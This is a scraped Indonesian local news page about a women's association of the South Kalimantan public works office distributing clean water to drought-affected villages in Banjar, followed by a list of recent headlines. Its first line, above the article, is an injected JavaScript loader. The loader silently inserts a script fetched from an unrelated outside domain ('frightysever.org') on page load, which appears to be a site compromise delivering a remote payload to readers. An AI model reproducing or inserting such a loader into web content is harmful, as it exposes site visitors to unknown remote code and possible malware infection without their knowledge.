(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P');
PUPR PROV KALSEL

DWP Dinas PUPR Kalsel Bagikan Air Bersih ke Daerah Kekeringan


KANALKALIMANTAN.COM, BANJARBARU – Kesulitan air bersih yang terjadi di sejumlah daerah saat ini mengetuk hati Dharma Wanita Persatuan (DWP) Dinas Pekerjaan Umum dan Penataan Ruang (PUPR) Provinsi Kalimantan Selatan (Kalsel) yang kemudian menjalankan aksi bagi air bersih.

Seperti yang baru-baru ini dilakukan mereka membagikan air bersih kepada warga Kecamatan Beruntung Baru, Kabupaten Banjar.

Pembagian air bersih ini nantinya dibagikan ke dua desa, yaitu Desa Muara Halayung dan Desa Pindahan Baru Kecamatan Beruntung Baru.

Baca juga: Tingkatkan Transaksi QRIS, BI Kalsel Gelar Pesta Rakyat Banua

Ketua DWP PUPR Kalsel, Fernanda Maulina Ahmad Solhan mengatakan kebutuhan air di masyarakat menjadi sangat penting terlebih untuk kebutuhan memasak dan minum.

“Untuk di daerah sini kebutuhan akan air bersih sulit dijangkau, untuk itu bertepatan momen Hari Jadi ke-73 Provinsi Kalsel sekaligus HUT ke-78 RI, kami mengadakan kegiatan berbagi air bersih,” kata Fernanda didampingi Fitri Dian Lestari Jumat (18/8/2023).

Dia berharap, kegiatan ini bisa membantu meringankan masyarakat dalam memperoleh air bersih, dan pihak terkait cepat tanggap dalam mengupayakan distribusi air bersih sampai ke masyarakat.

Baca juga: SKK PMII Se Kalsel di Haur Gading, Kaum Hawa Diajak Bijak Bermedsos

“Semoga misalnya penambahan pipa atau mesin air atau mungkin bisa disediakan tempat penampungan air bersih untuk sementara waktu,” harap dia.

Ia menyampaikan, untuk sementara pihaknya fokus di wilayah Aluhaluh dan Beruntung baru dengan total air sebanyak 20 ribu liter.

“Semoga saja kegiatan kami ini bisa menjadi agenda rutin di kegiatan bulanan Dharma Wanita Dinas PUPR,” pungkas dia. (Kanalkalimantan.com/MCKalsel/kk)

Reporter: kk
Editor: Dhani


Risa

Recent Posts

Soal Pungutan Acara Perpisahan Siswa, Ini Kata Ketua DPRD Banjarbaru

KANALKALIMANTAN.COM, BANJARBARU - Dewan Perwakilan Rakyat Daerah (DPRD) Kota Banjarbaru menyikapi persoalan iuran kegiatan acara… Read More

16 menit ago

Pungutan Acara Perpisahaan Siswa, Begini Respon Wali Kota Aditya

KANALKALIMANTAN.COM, BANJARBARU – Menyikapi pungutan acara perpisahan siswa sekolah di Banjarbaru, Wali Kota Banjarbaru Aditya… Read More

2 jam ago

Orangtua Pusing, ‘Bermewah-mewahan’ Perpisahan Anak Sekolah di Banjarbaru

Kadisdik: Silakan Perpisahan di Sekolah dan Dilakukan dengan Sederhana Read More

12 jam ago

Bappedalitbang Banjar Gelar Rapat Pembahasan Data Indikator Makro Pembangunan RPJPD

KANALKALIMANTAN.COM, MARTAPURA – Badan Perencanaan Pembangunan Daerah, Penelitian dan Pengembangan (Bappedalitbang) Kabupaten Banjar melaksanakan rapat Pembahasan… Read More

12 jam ago

Pergantian Perwira di Polres Banjarmasin, Ini Nama dan Jabatannya

KANALKALIMANTAN.COM, BANJARMASIN - Sejumlah perwira menengah (Pamen) dan perwira pertama (Pama) di lingkungan Kepolisian Resor… Read More

13 jam ago

O2SN dan FLS2N 2024 SD MI Tingkat Kabupaten Kapuas Digelar

KANALKALIMANTAN.COM, KUALA KAPUAS - Ratusan pelajar tingkat SD/MI di Kabupaten Kapuas antusias mengikuti upacara pembukaan… Read More

13 jam ago

This website uses cookies.